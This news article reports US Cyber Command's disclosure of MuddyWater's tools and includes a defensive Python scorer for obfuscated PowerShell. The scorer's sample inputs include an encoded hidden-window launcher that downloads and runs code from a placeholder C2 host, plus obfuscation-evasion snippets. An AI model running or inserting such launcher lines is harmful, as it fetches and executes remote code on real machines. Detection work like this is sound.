Iranian cyber threat exposed by US intelligence

Open-source tools deployed by Iranian cyber actors to monitor regime opponents have been identified.

The US Cyber Command’s Cyber National Mission Force has identified and disclosed multiple open-source tools leveraged by Iranian intelligence across networks around the world.

The group, referred to as ‘MuddyWater’, is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS). Its actors primarily target Middle Eastern nations, but have more recently sought to undermine European and North American networks.

According to the Congressional Research Service, the MOIS conducts domestic surveillance to identify regime opponents and surveil anti-regime activists abroad through a network of agents placed in Iran’s embassies.

The US Cyber Command has warned that the presence of multiple open-source tools on the same network could be an indicator of the presence of Iranian malicious cyber actors.

Specifically, the state-sponsored actors' methods include DLL side-loading, which tricks legitimate programs into loading and running malware, and obfuscating PowerShell scripts to hide command-and-control functions.
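As an added illustration of the obfuscated-PowerShell indicator described above (example code written for this article, not a tool from US Cyber Command and not derived from the disclosed samples), the script below scores a PowerShell command line against a handful of common obfuscation markers and decodes any -EncodedCommand payload so that the hidden content is scanned as well. The indicator weights, the suspicion threshold and the sample command lines are all constructed assumptions.

```python
import base64
import re
from typing import Optional

# Obfuscation markers often used to hide command-and-control logic in PowerShell.
# Each entry: (name, pattern, weight); the weights are an assumption for this example.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("string_concat_cmdlet", re.compile(r"'[A-Za-z-]{1,8}'\s*\+\s*'[A-Za-z-]{1,8}'"), 2),
    ("char_casting", re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("backtick_in_token", re.compile(r"[A-Za-z]`[A-Za-z]"), 2),
    ("join_or_reverse", re.compile(r"-join\b|\[array\]::reverse", re.I), 1),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("download", re.compile(r"downloadstring|downloadfile|net\.webclient", re.I), 1),
]

def decode_encoded_command(script: str) -> Optional[str]:
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) decoded, or None."""
    m = re.search(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", script, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script(script: str) -> dict:
    """Score one PowerShell script or command line; a decoded payload is scanned too."""
    decoded = decode_encoded_command(script)
    text = script if decoded is None else script + "\n" + decoded
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": total, "indicators": hits, "decoded": decoded, "suspicious": total >= 4}

# Constructed sample command lines (not taken from the disclosed MuddyWater samples).
SAMPLES = {
    "benign": r"Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object Length",
    # Cmdlet name split across strings and an argument built from [char] codes ("Write-Host hi").
    "split_strings": "$c = 'Inv' + 'oke-Ex' + 'pression'; & $c ([char]87+[char]114+[char]105+[char]116+[char]101+'-Host hi')",
    # A hidden-window launcher whose real content only appears after base64/UTF-16LE decoding.
    "encoded": "powershell -nop -w hidden -enc " + base64.b64encode(
        "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/x')".encode("utf-16-le")
    ).decode("ascii"),
}

def scan_samples() -> dict:
    """Run the scorer over every sample and return the results keyed by sample name."""
    return {name: score_script(text) for name, text in SAMPLES.items()}
```

The same scorer can be pointed at PowerShell script-block logging (event ID 4104) text or process command lines collected from endpoints; the decode step matters because the raw launcher line alone would only match the encoding and hidden-window markers.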

Samples of the suite of tools and JavaScript files used by the malicious cyber actors are being posted to the malware-sharing service VirusTotal.

This latest announcement from US Cyber Command comes just months after multinational cyber agencies observed an Iranian government-sponsored APT group exploiting Microsoft Exchange vulnerabilities to undermine critical infrastructure.

Iranian government-sponsored APT actors have actively targeted a broad range of victims across both the public and private sectors within the US and in partner nations, including Australia.

The joint cyber security advisory followed a joint investigation among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC).
